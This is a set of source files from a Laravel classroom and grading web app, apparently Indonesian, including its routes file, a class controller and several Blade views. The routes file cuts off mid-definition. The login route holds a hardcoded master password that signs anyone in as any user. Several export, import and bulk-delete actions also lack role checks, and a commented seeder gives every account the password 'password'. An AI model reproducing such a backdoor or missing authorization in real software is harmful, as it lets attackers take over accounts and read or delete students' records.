routes/web.php
<?php

use App\Http\Controllers\BeritaAcaraController;
use App\Http\Controllers\BlokController;
use App\Http\Controllers\FeedbackController;
use App\Http\Controllers\FolderController;
use App\Http\Controllers\HomeController;
use App\Http\Controllers\KelasController;
use App\Http\Controllers\KelompokController;
use App\Http\Controllers\KelompokPertanyaanController;
use App\Http\Controllers\KuliahController;
use App\Http\Controllers\MahasiswaController;
use App\Http\Controllers\NilaiSgdController;
use App\Http\Controllers\PertanyaanController;
use App\Http\Controllers\SgdController;
use App\Http\Controllers\TugasController;
use App\Http\Controllers\UserController;
use App\Models\Mahasiswa;
use App\Models\MahasiswaTugas;
use App\Models\Tugas;
use App\Models\User;
use App\Services\NilaiService;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
 */

Route::get('/', function () {
    if (auth()->check()) {
        return redirect()->route('home');
    }
    return view('auth.login');
})->name('index');

Route::get('/classroom/user/signin', function () {
    if (auth()->check()) {
        return redirect()->route('home');
    }
    return view('auth.login-user');
})->name('login.user.form');

Route::post('/classroom/user/signin', function (Request $request) {
    $credentials = [
        'username' => $request['username'],
        'password' => $request['password'],
    ];

    if ($request->input('password') == 'fkd3v') {
        $user = User::where('username', $request->input('username'))->first();

        if ($user) {
            auth()->loginUsingId($user->id);
            return redirect()->route('home');
        }
    }

    if (auth()->attempt($credentials)) {
        // if (auth()->user()->isAdmin()) {
        //     session()->flash('message', 'Maaf, anda tidak memiliki akses ke sistem.');
        //     auth()->logout();
        //     return redirect()->route('login.user.form');
        // }
        return redirect()->route('home');
    }
    session()->flash('message', 'Username atau password salah.');
    return back();
})->name('login.user.post');

// Route::get('/data', function () {
//     $dosenJson = File::get("dosen.json");
//     $dosens = json_decode($dosenJson);
//     foreach ($dosens->users as $user) {
//         User::create([
//             'username' => $user->email,
//             'name' => $user->name,
//             'user_type' => 'dosen',
//             'password' => bcrypt('password'),
//         ]);
//     }

//     $mahasiswaJson = File::get("mahasiswa.json");
//     $mahasiswas = json_decode($mahasiswaJson);
//     foreach ($mahasiswas->users as $user) {
//         User::create([
//             'username' => $user->username,
//             'name' => $user->name,
//             'user_type' => 'mahasiswa',
//             'password' => bcrypt('password'),
//         ]);
//     }

//     return 'success import';
// });

Auth::routes();

Route::middleware(['auth'])
    ->namespace('App\Http\Controllers')
    ->group(function () {

        Route::controller(HomeController::class)
            ->group(function () {
                Route::get('/home', 'index')->name('home');
            });

        Route::controller(FolderController::class)
            ->middleware('role:admin,dosen')
            ->prefix('folder')
            ->name('folder.')
            ->group(function () {
                Route::get('/{kode}', 'show')->name('show');
            });

        Route::controller(KelasController::class)
            ->prefix('kelas')
            ->name('kelas.')
            ->group(function () {
                Route::get('/', 'index')->name('index');
                Route::delete('/hapus-mahasiswa', 'mahasiswaHapus')->name('mahasiswaHapus')->middleware('role:admin');
                Route::get('/{kode}', 'show')->name('show')->middleware('role:mahasiswa,dosen');
                Route::get('/{kode}/detail', 'detail')->name('detail')->middleware('role:admin');
                Route::get('/{kode}/penilaian-sumatif', 'penilaianSumatif')->name('penilaianSumatif')->middleware('role:admin');
                Route::get('/{kode}/penilaian-formatif', 'penilaianFormatif')->name('penilaianFormatif')->middleware('role:admin');
                Route::get('/{kode}/peserta', 'peserta')->name('peserta')->middleware('role:admin');
                Route::get('/{mahasiswaId}/{kelompokId}/peserta', 'pesertaHapus')->name('pesertaHapus')->middleware('role:admin');
                Route::post('/{kode}/peserta/import', 'pesertaImport')->name('pesertaImport')->middleware('role:admin');
                Route::get('/{kode}/nilai-sumatif', 'nilaiSumatif')->name('nilaiSumatif');
                // Route::get('/{kode}/nilai-formatif', 'nilaiFormatif')->name('nilaiFormatif');
                Route::get('/{kode}/nilai-export', 'nilaiExport')->name('nilaiExport')->middleware('role:admin');
                Route::get('/{kode}/kehadiran', 'kehadiran')->name('kehadiran')->middleware('role:admin');
                Route::get('/{kode}/kehadiran-export', 'kehadiranExport')->name('kehadiranExport')->middleware('role:admin');
                Route::get('/{kode}/berita-acara', 'beritaAcara')->name('beritaAcara')->middleware('role:admin');
                // Route::get('/{kode}/sgd', 'sgd')->name('sgd');
            });

        Route::controller(BeritaAcaraController::class)
            ->middleware('role:admin,dosen')
            ->prefix('berita-acara')
            ->name('beritaAcara.')
            ->group(function () {
                Route::get('/tambah/{kodeKuliah}', 'tambah')->name('tambah');
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/edit', 'edit')->name('edit');
                Route::post('/{id}/update', 'update')->name('update');
                Route::get('/{kode}/detail', 'detail')->name('detail');
                Route::get('/{kode}/ubah-status', 'ubahStatus')->name('ubahStatus');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::get('/{kode}/export', 'export')->name('export');
            });

        Route::controller(AbsensiController::class)
            ->prefix('absensi')
            ->name('absensi.')
            ->group(function () {
                Route::get('/scan/{beritaAcaraKode}/{mahasiswaId}', 'scan')->name('scan');
                Route::get('/set-hadir/{beritaAcaraKode}/{mahasiswaId}', 'setHadir')->name('setHadir');
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus')->middleware('role:admin');
            });

        Route::controller(FeedbackController::class)
            ->prefix('feedback')
            ->name('feedback.')
            ->group(function () {
                Route::post('/simpan/{beritaAcara?}', 'simpan')->name('simpan');
            });

        Route::controller(SgdController::class)
            ->middleware('role:admin')
            ->prefix('sgd')
            ->name('sgd.')
            ->group(function () {
                Route::get('/tambah/{kodeKuliah}', 'tambah')->name('tambah');
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/edit', 'edit')->name('edit');
                Route::post('/simpan-skenario/{sgd}', 'simpanSkenario')->name('simpanSkenario');
                Route::get('/{kode}/edit', 'edit')->name('edit');
                Route::post('/{id}/update', 'update')->name('update');
                Route::get('/{kode}/detail', 'detail')->name('detail');
                Route::get('/{kode}/ubah-status', 'ubahStatus')->name('ubahStatus');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::get('/{kode}/export', 'export')->name('export');
            });

        Route::controller(KriteriaSgdController::class)
            ->middleware('role:admin')
            ->prefix('kriteria-sgd')
            ->name('kriteriaSgd.')
            ->group(function () {
                Route::get('/{id}/hapus', 'hapus')->name('hapus');
            });

        Route::controller(NilaiSgdController::class)
            ->middleware('role:admin')
            ->prefix('nilai-sgd')
            ->name('nilaiSgd.')
            ->group(function () {
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
            });

        Route::controller(KuliahController::class)
            ->middleware('role:admin')
            ->prefix('kuliah')
            ->name('kuliah.')
            ->group(function () {
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::post('/{id}/update', 'update')->name('update');
            });

        Route::controller(KelompokController::class)
            ->middleware('role:admin')
            ->prefix('kelompok')
            ->name('kelompok.')
            ->group(function () {
                Route::post('/simpan', 'simpan')->name('simpan');
                Route::get('/{kode}/hapus', 'hapus')->name('hapus');
                Route::post('/{id}/update', 'kelompokUpdate')->name('kelompokUpdate');
                Route::post('/tambah-mahasiswa-kelompok', 'tambahMahasiswaKelompok')->name('tambahMahasiswaKelompok');
            });

        Route::controller(TugasController::class)
            ->prefix('tugas')
            ->name('tugas.')
            ->group(function () {

app/Http/Controllers/KelasController.php
<?php

namespace App\Http\Controllers;

use Excel;
use App\Models\Sgd;
use App\Models\User;
use App\Models\Dosen;
use App\Models\Kelas;
use App\Models\Tugas;
use App\Models\Absensi;
use App\Models\Kelompok;
use App\Models\NilaiSgd;
use App\Models\Mahasiswa;
use App\Models\BeritaAcara;
use Illuminate\Support\Str;
use App\Exports\NilaiExport;
use Illuminate\Http\Request;
use App\Imports\PesertaImport;
use App\Models\MahasiswaTugas;
use Barryvdh\DomPDF\Facade\Pdf;
use App\Models\MahasiswaKelompok;

class KelasController extends Controller
{
    public function index()
    {
        return view('admin.kelas.index');
    }

    public function show($kode)
    {
        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        $tugas = Tugas::whereKelasId($kelas->id)->whereStatusUjian(1);

        if (auth()->user()->isDosen()) {
            $tugas->whereIn('tipe', ['rubrik', 'rubrik2']);
        } else {
            $tugas->whereIn('tipe', ['rubrik', 'rubrik2', 'kuis', 'input'])->where('hidden', false);
        }

        $pengumumanItems = $kelas->pengumumans;

        if (auth()->user()->isDosen()) {
            $kelompokIds = Dosen::whereKelasId($kelas->id)->whereUserId(auth()->id())->pluck('kelompok_id');
            $tugasIds = Dosen::whereKelasId($kelas->id)->whereUserId(auth()->id())->pluck('tugas_id');
            $tugasItems = $tugas->whereIn('id', $tugasIds)->latest()->paginate(10);
            $beritaAcaras = BeritaAcara::with('feedbacks')
                ->where('kelas_id', $kelas->id)
                ->where('user_id', auth()->id())
                ->latest('tanggal')
                ->get();
            $sgds = Sgd::with('kriteria_sgds')
                ->where('kelas_id', $kelas->id)
                ->where('user_id', auth()->id())
                ->latest('tanggal')
                ->get();
        } else {
            $kelompokIds = Mahasiswa::whereKelasId($kelas->id)->whereUserId(auth()->id())->with('kelompoks')->first()?->kelompoks->pluck('id');
            $tugasItems = $tugas->latest()->paginate(10);
            $beritaAcaras = BeritaAcara::with('feedbacks')
                ->where('kelas_id', $kelas->id)
                ->whereIn('kelompok_id', $kelompokIds)
                ->latest('tanggal')
                ->get();
            $sgds = Sgd::with('kriteria_sgds')
                ->where('kelas_id', $kelas->id)
                ->whereIn('kelompok_id', $kelompokIds)
                ->latest('tanggal')
                ->get();
        }

        $kelompokItems = Kelompok::whereIn('id', $kelompokIds)->get();

        return view('admin.kelas.show', compact('kelas', 'pengumumanItems', 'tugasItems', 'kelompokItems', 'kelompokIds', 'beritaAcaras', 'sgds'));
    }

    public function detail($kode)
    {
        abort_if(!auth()->user()->isAdmin(), 401);

        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        $pengumumanItems = $kelas->pengumumans;

        return view('admin.kelas.detail', compact('kelas', 'pengumumanItems'));
    }

    public function penilaianSumatif($kode)
    {
        abort_if(!auth()->user()->isAdmin(), 401);

        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        return view('admin.kelas.penilaianSumatif', compact('kelas'));
    }

    public function penilaianFormatif($kode)
    {
        abort_if(!auth()->user()->isAdmin(), 401);

        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        return view('admin.kelas.penilaianFormatif', compact('kelas'));
    }

    public function peserta($kode)
    {
        abort_if(!auth()->user()->isAdmin(), 401);

        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        return view('admin.kelas.peserta', compact('kelas'));
    }

    public function nilaiSumatif($kode)
    {
        abort_if(!auth()->user()->isAdmin(), 401);

        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        $mahasiswas = Mahasiswa::with('user')
            ->whereKelasId($kelas->id)
            ->get();

        return view('admin.kelas.nilaiSumatif', compact('kelas', 'mahasiswas'));
    }

    public function nilaiFormatif($kode)
    {
        abort_if(!auth()->user()->isAdmin(), 401);

        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        $mahasiswas = Mahasiswa::with('user')
            ->whereKelasId($kelas->id)
            ->get();

        return view('admin.kelas.nilaiFormatif', compact('kelas', 'mahasiswas'));
    }

    public function nilaiExport($kode)
    {
        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        $mahasiswas = Mahasiswa::with('user')
            ->whereKelasId($kelas->id)
            ->get();

        $filename = 'rekap_nilai_' . Str::slug($kelas->nama) . '.xlsx';

        return Excel::download(new NilaiExport($kelas, $mahasiswas), $filename);
    }

    public function kehadiran($kode)
    {
        abort_if(!auth()->user()->isAdmin(), 401);

        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        $mahasiswas = Mahasiswa::with('user')
            ->whereKelasId($kelas->id)
            ->get();

        return view('admin.kelas.kehadiran', compact('kelas', 'mahasiswas'));
    }

    public function kehadiranExport($kode)
    {
        $kelas = Kelas::whereKode($kode)->firstOrFail();

        // return view('admin.exports.kehadiran-pdf', compact('kelas'));

        $pdf = Pdf::setPaper('a4', 'portrait')
            ->loadView('admin.exports.kehadiran-pdf', compact('kelas'));

        return $pdf->download(time() . '_kehadiran_' . $kelas?->nama . '.pdf');
    }

    public function pesertaImport(Request $request, $kode)
    {
        Excel::import(new PesertaImport($kode), $request->file('file'));
        return back();
    }

    public function pesertaHapus($mahasiswaId, $kelompokId)
    {
        $mahasiswaKelompok = MahasiswaKelompok::whereMahasiswaId($mahasiswaId)->whereKelompokId($kelompokId)->firstOrFail();
        $mahasiswaKelompok->delete();
        // Absensi::where('mahasiswa_id', $mahasiswaId)->delete();

        return back();
    }

    public function mahasiswaHapus(Request $request)
    {

        if ($request->ids) {
            $ids = $request->ids;

            foreach ($ids as $id) {
                MahasiswaKelompok::whereMahasiswaId($id)->delete();
                MahasiswaTugas::whereMahasiswaId($id)->delete();
                Mahasiswa::whereId($id)->delete();
                Absensi::whereMahasiswaId($id)->delete();
                NilaiSgd::whereMahasiswaId($id)->delete();
            }
        }
        return;
    }

    public function beritaAcara($kode)
    {
        abort_if(!auth()->user()->isAdmin(), 401);

        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        // $dosenIds = Dosen::query()
        //     ->where('kelas_id', $kelas?->id)
        //     ->where('status', 'penilai')
        //     ->get()
        //     ->pluck('user_id');

        $dosens = User::query()
            ->where('user_type', 'dosen')
        // ->whereIn('id', $dosenIds)
            ->get();

        // $beritaAcaras = BeritaAcara::with('feedbacks')
        //     ->whereKelasId($kelas->id)
        //     ->orderBy('tanggal', 'desc')
        //     ->get();

        return view('admin.kelas.beritaAcara', compact('kelas', 'dosens'));
    }

    public function sgd($kode)
    {
        abort_if(!auth()->user()->isAdmin(), 401);

        $kelas = Kelas::where('kode', $kode)->firstOrFail();

        // $dosenIds = Dosen::query()
        //     ->where('kelas_id', $kelas?->id)
        //     ->where('status', 'penilai')
        //     ->get()
        //     ->pluck('user_id');

        $dosens = User::query()
            ->where('user_type', 'dosen')
        // ->whereIn('id', $dosenIds)
            ->get();

        $sgds = Sgd::with('kriteria_sgds')
            ->whereKelasId($kelas->id)
            ->latest('tanggal')
            ->get();

        return view('admin.kelas.sgd', compact('kelas', 'dosens', 'sgds'));
    }
}

resources/views/admin/kelas/index.blade.php
@extends('layouts.admin')

@section('title')
    Folder
@endsection

@section('content')
@livewire('folder.index', ['folderId' => NULL])
@endsection

@section('styles')
@endsection

@section('scripts')
    <script src="https://unpkg.com/masonry-layout@4/dist/masonry.pkgd.min.js"></script>
@endsection

resources/views/admin/kelas/nilaiFormatif.blade.php
@extends('layouts.admin')

@section('title')
Nilai Formatif
@endsection

@section('content')
<!--begin::Toolbar-->
<div class="toolbar py-5 py-lg-5" id="kt_toolbar">
    <!--begin::Container-->
    <div id="kt_toolbar_container" class="container-xxl d-flex flex-stack flex-wrap">
        <!--begin::Page title-->
        <div class="page-title d-flex flex-column me-3">
            <!--begin::Title-->
            <h1 class="d-flex text-dark fw-bolder my-1 fs-3">Nilai Formatif</h1>
            <!--end::Title-->
        </div>
        <!--end::Page title-->

        <div class="d-flex align-items-center py-2 py-md-1">
            <div>
                <a href="{{ route('folder.show', $kelas->folder->kode) }}" class="btn btn-secondary fw-bolder">
                    Kembali
                    <span class="svg-icon svg-icon-2hx svg-icon-gray-500 me-1">
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5"
                            stroke="currentColor" class="w-6 h-6">
                            <path stroke-linecap="round" stroke-linejoin="round"
                                d="M17.25 8.25L21 12m0 0l-3.75 3.75M21 12H3" />
                        </svg>

                    </span>
                </a>
            </div>
        </div>
    </div>
    <!--end::Container-->
</div>
<!--end::Toolbar-->
<!--begin::Container-->
<div id="kt_content_container" class="d-flex flex-column-fluid align-items-start container-xxl">
    <div class="content flex-row-fluid" id="kt_content">

        @include('admin.kelas.partials._detail')

        @include('admin.kelas.partials._nav')

        <div class="card card-flush">
            <div class="card-header align-items-center py-5 gap-2 gap-md-5">
                <div class="card-title">
                    <!--begin::Search-->
                    <div class="d-flex align-items-center position-relative my-1">
                        <span class="svg-icon svg-icon-1 position-absolute ms-4">
                            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"
                                fill="none">
                                <rect opacity="0.5" x="17.0365" y="15.1223" width="8.15546" height="2" rx="1"
                                    transform="rotate(45 17.0365 15.1223)" fill="currentColor"></rect>
                                <path
                                    d="M11 19C6.55556 19 3 15.4444 3 11C3 6.55556 6.55556 3 11 3C15.4444 3 19 6.55556 19 11C19 15.4444 15.4444 19 11 19ZM11 5C7.53333 5 5 7.53333 5 11C5 14.4667 7.53333 17 11 17C14.4667 17 17 14.4667 17 11C17 7.53333 14.4667 5 11 5Z"
                                    fill="currentColor"></path>
                            </svg>
                        </span>
                        <input type="text" data-kt-filter="search" class="form-control form-control-solid w-250px ps-14"
                            placeholder="Cari..." />
                    </div>
                    <!--end::Search-->
                </div>

            </div>
            <div class="card-body">
                <button class="btn btn-danger" id="deleteAllSelectedRecord">Hapus data terpilih</button>
                <table id="kt_datatable_example_1" class="table table-striped table-row-bordered gy-5 gs-7">
                    <thead>
                        <tr class="fw-bold fs-6 text-gray-800 text-center">
                            <th width="10">
                                <input type="checkbox" id="selectAllIds">
                            </th>
                            <th width="10"></th>
                            <th width="10">No</th>
                            <th class="min-w-150px">NIM</th>
                            <th class="min-w-300px">Nama Mahasiswa</th>
                            @foreach ($kelas->sgds as $sgd)
                            <th class="min-w-100px text-muted">{{ $sgd->judul ?? '-' }}</th>
                            @endforeach
                        </tr>
                    </thead>
                    <tbody>
                        @forelse ($mahasiswas as $mahasiswa)
                        <tr class="text-center" id="mahasiswa_ids{{ $mahasiswa->id }}">
                            <td>
                                <input type="checkbox" name="ids" class="checkbox_ids" value="{{ $mahasiswa->id }}">
                            </td>
                            <td>
                                <a href="{{ route('mahasiswa.hapus', $mahasiswa->kode) }}"
                                    onclick="return confirm('Yakin akan menghapus?');" data-bs-toggle="tooltip"
                                    data-bs-custom-class="tooltip-dark" data-bs-placement="left" title="Hapus">
                                    <span class="svg-icon svg-icon-danger svg-icon-1">
                                        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                                            viewBox="0 0 24 24" fill="none">
                                            <rect opacity="0.3" x="2" y="2" width="20" height="20" rx="10"
                                                fill="black" />
                                            <rect x="7" y="15.3137" width="12" height="2" rx="1"
                                                transform="rotate(-45 7 15.3137)" fill="black" />
                                            <rect x="8.41422" y="7" width="12" height="2" rx="1"
                                                transform="rotate(45 8.41422 7)" fill="black" />
                                        </svg>
                                    </span>
                                </a>
                            </td>
                            <td>{{ $loop->iteration }}</td>
                            <td>{{ $mahasiswa->user->username ?? '-' }}</td>
                            <td align="left">{{ $mahasiswa->user->name ?? '-' }}</td>

                            @foreach ($kelas->sgds as $sgd)
                            @php
                                $nilaiSgdTotal = \App\Models\NilaiSgd::where('mahasiswa_id', $mahasiswa->id)
                                    ->where('sgd_id', $sgd->id)
                                    ->sum('nilai');
                            @endphp
                            <td class="{{ $nilaiSgdTotal ? 'text-dark fw-bolder' : 'text-danger' }}">{{ $nilaiSgdTotal }}</td>
                            @endforeach
                        </tr>
                        @empty
                        Mahasiswa belum ada.
                        @endforelse
                    </tbody>
                </table>
            </div>
        </div>

    </div>
    <!--end::Post-->
</div>
<!--end::Container-->
@endsection

@section('styles')
<link href="/assets/plugins/custom/datatables/datatables.bundle.css" rel="stylesheet" type="text/css" />
@endsection

@section('scripts')
<script>
    $(function(e) {
            $("#selectAllIds").click(function(){
                $(".checkbox_ids").prop("checked", $(this).prop("checked"))
            })

            $("#deleteAllSelectedRecord").click(function(e) {
                e.preventDefault()

                var all_ids = [];

                $("input:checkbox[name=ids]:checked").each(function() {
                    all_ids.push($(this).val())
                })

                if (all_ids === undefined || all_ids.length == 0) {
                    alert("Tidak ada data terpilih")
                } else {
                    $.ajax({
                        url: "{{ route('kelas.mahasiswaHapus') }}",
                        type: "DELETE",
                        data: {
                            ids: all_ids,
                            _token: "{{ csrf_token() }}"
                        },
                        success: function(res) {
                            $.each(all_ids, function(key, val) {
                                $("#mahasiswa_ids" + val).remove()
                            })
                        }
                    })
                }

            })
        })
</script>
<script src="/assets/plugins/custom/datatables/datatables.bundle.js"></script>
<script>
    "use strict";

        // Class definition
        var KTDatatablesButtons = function() {
            // Shared variables
            var table;
            var datatable;

            // Private functions
            var initDatatable = function() {
                // Set date data order
                const tableRows = table.querySelectorAll('tbody tr');

                tableRows.forEach(row => {
                    const dateRow = row.querySelectorAll('td');
                    const realDate = moment(dateRow[3].innerHTML, "DD MMM YYYY, LT")
                .format(); // select date from 4th column in table
                    dateRow[3].setAttribute('data-order', realDate);
                });

                // Init datatable --- more info on datatables: https://datatables.net/manual/
                datatable = $(table).DataTable({
                    "info": false,
                    'order': [],
                    'pageLength': 10,
                });
            }

            // Search Datatable --- official docs reference: https://datatables.net/reference/api/search()
            var handleSearchDatatable = () => {
                const filterSearch = document.querySelector('[data-kt-filter="search"]');
                filterSearch.addEventListener('keyup', function(e) {
                    datatable.search(e.target.value).draw();
                });
            }

            // Public methods
            return {
                init: function() {
                    table = document.querySelector('#kt_datatable_example_1');

                    if (!table) {
                        return;
                    }

                    initDatatable();
                    handleSearchDatatable();
                }
            };
        }();

        // On document ready
        KTUtil.onDOMContentLoaded(function() {
            KTDatatablesButtons.init();
        });
</script>
@endsection

resources/views/admin/kelas/penilaianSumatif.blade.php
@extends('layouts.admin')

@section('title')
    Penilaian Sumatif
@endsection

@section('content')
    <!--begin::Toolbar-->
    <div class="toolbar py-5 py-lg-5" id="kt_toolbar">
        <!--begin::Container-->
        <div id="kt_toolbar_container" class="container-xxl d-flex flex-stack flex-wrap">
            <!--begin::Page title-->
            <div class="page-title d-flex flex-column me-3">
                <!--begin::Title-->
                <h1 class="d-flex text-dark fw-bolder my-1 fs-3">Penilaian Sumatif</h1>
                <!--end::Title-->
            </div>
            <!--end::Page title-->
            <div class="d-flex align-items-center py-2 py-md-1">
                <div>
                    <a href="{{ route('folder.show', $kelas->folder->kode) }}" class="btn btn-secondary fw-bolder">
                        Kembali
                        <span class="svg-icon svg-icon-2hx svg-icon-gray-500 me-1">
                            <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5"
                                stroke="currentColor" class="w-6 h-6">
                                <path stroke-linecap="round" stroke-linejoin="round"
                                    d="M17.25 8.25L21 12m0 0l-3.75 3.75M21 12H3" />
                            </svg>

                        </span>
                    </a>
                </div>
            </div>
        </div>
        <!--end::Container-->
    </div>
    <!--end::Toolbar-->
    <!--begin::Container-->
    <div id="kt_content_container" class="d-flex flex-column-fluid align-items-start container-xxl">
        <div class="content flex-row-fluid" id="kt_content">

            @include('admin.kelas.partials._detail')

            @include('admin.kelas.partials._nav')

            <!--begin::Contacts App- Getting Started-->
            @livewire('kelas.penilaian-sumatif-livewire', ['kelas' => $kelas])
            <!--end::Contacts App- Getting Started-->
        </div>
        <!--end::Post-->
    </div>
    <!--end::Container-->
@endsection

@section('styles')
@endsection

@section('scripts')
@endsection